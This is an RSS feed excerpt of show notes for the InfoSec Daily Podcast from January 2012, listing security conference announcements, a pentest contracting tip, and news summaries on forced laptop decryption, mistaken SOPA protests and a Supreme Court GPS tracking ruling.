<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3415/0/infosec-daily-podcast-episode-577.mp3" length="18705600" type="audio/mpeg" />
		<itunes:duration>0:38:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &#160;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &#160;Also, when you talk to a lawyer, don&#8217;t make small talk. &#160;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 576 &#8211; Encryption Legally Broken, Stop Scottish Farmers!, No GPS Tracking, No OPT Out &amp; SOPA/ACTA Hack</title>
		<link>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack</link>
		<comments>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack#comments</comments>
		<pubDate>Wed, 25 Jan 2012 03:58:07 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3412</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2733774264938891" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 576 for January 24, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Judge Robert Blackburn ordered a Peyton, Colo., woman to decrypt the hard drive of a Toshiba laptop computer no later than February 21&#8211;or face the consequences including contempt of court.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Blackburn, a George W. Bush appointee, ruled that the Fifth Amendment posed no barrier to his decryption order. The Fifth Amendment says that nobody may be &quot;compelled in any criminal case to be a witness against himself,&quot; which has become known as the right to avoid self-incrimination.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I find and conclude that the Fifth Amendment is not implicated by requiring production of the unencrypted contents of the Toshiba Satellite M305 laptop computer,&quot; Blackburn wrote in a 10-page opinion today. He said the All Writs Act, which dates back to 1789 and has been used to require telephone companies to aid in surveillance, could be invoked in forcing decryption of hard drives as well.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ramona Fricosu, who is accused of being involved in a mortgage scam, has declined to decrypt a laptop encrypted with Symantec&#39;s PGP Desktop that the FBI found in her bedroom during a raid of a home she shared with her mother and children (and whether she&#39;s even able to do so is not yet clear).</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2012/01/23/freetard_sopa_fail/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/23/freetard_sopa_fail/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Angry copyfighters barraged a small Scottish food certification agency with abuse last week &#8211; in the belief they were protesting against hated US anti-piracy legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Scottish Organic Producers Association &#8211; whose website is at</span><a href="http://www.sopa.org.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">sopa.org.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; was perplexed when it found itself on the receiving of dozens of nasty and illiterate emails.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Remarkably, nothing about the site&#39;s design &#8211; including pictures of sheep, vegetables, Angus cattle and fruit &#8211; did anything to suggest to the furious freetards that they&#39;d got the wrong SOPA &#8211; or that something might be not quite right.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.eweek.com/c/a/Mobile-and-Wireless/Supreme-Court-Ban-on-Warrantless-GPS-Tracking-has-Wider-Implications-212536/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Mobile-and-Wireless/Supreme-Court-Ban-on-Warrantless-GPS-Tracking-has-Wider-Implications-212536/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A U.S. Supreme Court decision released on Jan. 23 will have a significant impact on how law enforcement officers can use GPS technology to track criminal suspects in a wide variety of cases.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In this case, the use of a GPS location device attached to the bottom of a car driven by a suspect allegedly to conduct drug deals was considered a violation of the suspect&rsquo;s Fourth Amendment rights under the U.S. Constitution. But in some ways the case raises more questions than it answers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The case in question was the conviction of Antoine Jones for drug trafficking. The police asked for and received a warrant for the GPS tracking in the District of Columbia good for 10 days. However, the police didn&rsquo;t actually manage to affix the device to the vehicle being used by Jones until 11 days later, in a parking lot in Maryland. The trial court accepted the GPS evidence, which helped locate the place where Jones stored his drugs, but that was overturned on appeal, as was the conviction.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Supreme Court, in deciding the case, took the most narrow possible view. The reasoning behind the decision was that the act of attaching the GPS device after the warrant expired constituted an illegal search. Essentially, the court reasoned that by touching Jones&rsquo; car, the police effectively seized his effects without a warrant, whicThe right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated.&rdquo; All such seizures require a properly sworn warrant issued by a court, the amendment says.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">h is one of the things that the Fourth Amendment says you can&rsquo;t do. The Fourth Amendment says &ldquo;&hellip;</span></p>
